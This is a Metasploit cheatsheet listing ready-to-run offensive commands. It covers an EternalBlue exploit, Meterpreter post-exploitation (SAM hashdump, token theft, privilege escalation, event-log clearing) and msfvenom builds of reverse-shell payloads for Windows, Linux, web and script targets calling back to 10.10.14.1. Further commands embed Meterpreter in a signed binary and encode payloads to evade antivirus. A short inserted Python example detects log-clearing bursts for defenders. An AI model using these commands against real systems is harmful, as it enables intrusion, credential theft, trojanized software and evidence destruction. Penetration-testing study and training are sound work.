
Metasploit cheatsheet

A quick cheatsheet for common usage of the Metasploit Framework (MSF). Includes common switches and red team/penetration testing examples.

Tags: hacking, c2, penetration testing, red teaming, malware

#Getting Started

Launch Metasploit

Basic

msfconsole

Quiet Start (No Banner)

msfconsole -q

Start with a resource script

msfconsole -r file.rc

Common Commands

search <term>                # Search for a module
use <module_path>            # Use a module
info                         # Show module info
show options / show payloads # Show module config
set <OPTION> <VALUE>         # Set module option
setg <OPTION> <VALUE>        # Set global option
unsetg <OPTION>              # Unset global option
run / exploit                # Execute module
exploit -j -z                # Run as a background job, without interacting with the session
check                        # Test if target is vulnerable
creds                        # List all credentials in the database

Handling Sessions & Jobs

List all sessions

sessions -l

Connect to a session

sessions <id>

Kill a session

sessions -k <id>

List all running jobs

jobs -l

Kill Specified Job

jobs -k <id>

Module Types

Type       Purpose
exploit    Launch attack
payload    Code delivered to target
auxiliary  Scanners, fuzzers, etc.
post       Post-exploit modules
encoder    Obfuscate payloads
evasion    AV bypass tools
nop        Payload padding

Start an Exploit Handler

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <local_ip>

set LPORT <port>

run -j                       # -j backgrounds the handler

Running an exploit

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_https  

set rhost <target_IP>

# If required

set rport <target_port> 

exploit

Common Exploit Functions

Command  Description
check    Check to see if a target is vulnerable
rcheck   Reloads the module and checks if the target is vulnerable
rerun    Alias for rexploit
exploit  Launch an exploit attempt
run      Alias for exploit

Notes:
check accepts target ranges as arguments instead of setting an rhost
check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

#Meterpreter

Core Commands on Session

Get System Info

sysinfo

Get user context

getuid

Get Process List

ps

Migrate to new Process

migrate <pid>

Open a system shell (e.g. bash/cmd.exe)

shell

Exit the session

exit

Background the session

background

# Or

bg

File System Commands

Get Current Target Working Directory

pwd

cd # Change Directory

Get Current Local Working Directory

lpwd

lcd # Change Directory

List Files

ls

Transfer Files

# Target to Local
download <file>

# Local to Target
upload <file>

View Contents of File

cat <file>

Edit Contents of File In-Line

edit <file>

System Commands (Windows Focused)

Get the PID Meterpreter is running as

getpid

Run a program "hidden"

execute -f <exe> -H

Clear all Application/System/Security Event Logs

# Requires NT/System. Not OPSEC Safe
clearev

Shutdown or Reboot Target

reboot

shutdown
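
From the defender's side, the event-log clearing command listed above is noisy: clearing the Security log records Event ID 1102 in that log, and clearing the Application or System log records Event ID 104 in the System log. The following is an added example, not part of the original cheatsheet, that flags hosts where all three logs are cleared within one short window; the record layout and the sample events are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (assumed layout: fields already parsed from a
# forwarded Windows event stream). 1102 = Security log cleared; 104 = another
# log (here Application or System) cleared, recorded in the System log.
SAMPLE_EVENTS = [
    {"host": "WS01", "time": "2026-01-22T10:15:02", "event_id": 104, "cleared": "Application"},
    {"host": "WS01", "time": "2026-01-22T10:15:02", "event_id": 104, "cleared": "System"},
    {"host": "WS01", "time": "2026-01-22T10:15:03", "event_id": 1102, "cleared": "Security"},
    {"host": "SRV02", "time": "2026-01-22T03:00:00", "event_id": 104, "cleared": "Application"},
    {"host": "SRV02", "time": "2026-01-22T09:30:00", "event_id": 1102, "cleared": "Security"},
    {"host": "WS03", "time": "2026-01-22T11:00:00", "event_id": 4624, "cleared": None},
]
CLEAR_EVENT_IDS = {104, 1102}
CORE_LOGS = {"Application", "System", "Security"}


def find_log_clear_bursts(events, window=timedelta(seconds=60)):
    """Alert per host: 'high' if all three core logs are cleared inside one
    window, otherwise 'medium' for each individual log-clear event."""
    per_host = defaultdict(list)
    for ev in events:
        if ev["event_id"] in CLEAR_EVENT_IDS and ev["cleared"]:
            when = datetime.fromisoformat(ev["time"])
            per_host[ev["host"]].append((when, ev["cleared"]))

    alerts = []
    for host, clears in sorted(per_host.items()):
        clears.sort()
        for start, _ in clears:
            # Logs cleared between this event and the end of its window.
            logs = {n for ts, n in clears if timedelta(0) <= ts - start <= window}
            if CORE_LOGS <= logs:
                alerts.append({"host": host, "severity": "high", "logs": sorted(logs)})
                break
        else:  # no window covered all three logs: report each clear on its own
            alerts += [{"host": host, "severity": "medium", "logs": [n]} for _, n in clears]
    return alerts


if __name__ == "__main__":
    for alert in find_log_clear_bursts(SAMPLE_EVENTS):
        print(alert)
```
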

Route Commands

List All Routes

route

Add or Remove a Route

route [add/remove] <subnet> <netmask>

Delete all routes

route flush

Collection

Take a Screenshot of the desktop

screenshot

Creeper Mode: Watch the desktop

screenshare

Privileges

Steal Impersonation Token

steal_token

Release active impersonation tokens

drop_token

Attempt to Enable All Privileges Available to the Current Process

getprivs

Attempt to Automate Privilege Escalation using Exploits

getsystem

Attempt to Dump SAM Database

hashdump

#MSFVenom

Switches

Option          Description
-p              Payload
-f              Format (exe, elf, raw)
-o              Output file
-a              Architecture (x86, x64)
--platform      Platform (windows, linux)
-b              Bad chars (\x00\x0a)
-e              Encoder
-i              Encoding iterations
-x              Template file (exe)
-s              Max size
--help-formats  List all formats

Basic Usage

Basic form to create an EXE

msfvenom -p <payload> LHOST=<listening ip> LPORT=<port> -f exe -o shell.exe

Example

msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f elf > bind.elf

To get Raw Shellcode for Shellcode Runners

msfvenom -p <payload> LHOST=<listening ip> LPORT=<port> -f c

Example Windows Payloads

Standard Reverse Shell EXE on x64 arch

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell.exe

Stageless Meterpreter Reverse (LARGE FILE)

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell.exe

Embed Meterpreter into an Existing Signed Binary

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -x signed.exe -k -f exe -o evil_signed.exe

Example Linux Payloads

Reverse shell ELF (x86)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf > shell.elf

Reverse Shell Bash script (payload as command)

msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.1 LPORT=9001 -f raw

Example Web Payloads

PHP reverse shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw -o shell.php

ASP reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f asp > shell.asp

Example Script Payloads

Python Rev Shell

msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw > shell.py

Powershell Rev Shell

msfvenom -p windows/powershell_reverse_tcp LHOST=10.10.14.1 LPORT=9001 -f psh-cmd

Evasion and Obfuscation

Encoding with shikata_ga_nai (3 iterations)

# \ is a line continuation in bash; the command continues on the next line
# NOTE: Does not work on Win 11
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.1 LPORT=4444 \
-e x86/shikata_ga_nai -i 3 -f exe -o enc_shell.exe

Avoiding Bad Characters

msfvenom -p windows/shell_reverse_tcp \
LHOST=10.10.14.1 LPORT=4444 \
-b '\x00\x0a\x0d' -f exe -o no_badchars.exe

Pad The Payload with NOPS

# -n prepends a NOP sled; the number is how many NOPs you want
msfvenom -p windows/shell_reverse_tcp \
LHOST=10.10.14.1 LPORT=4444 \
-n 16 -f exe > nop_shell.exe
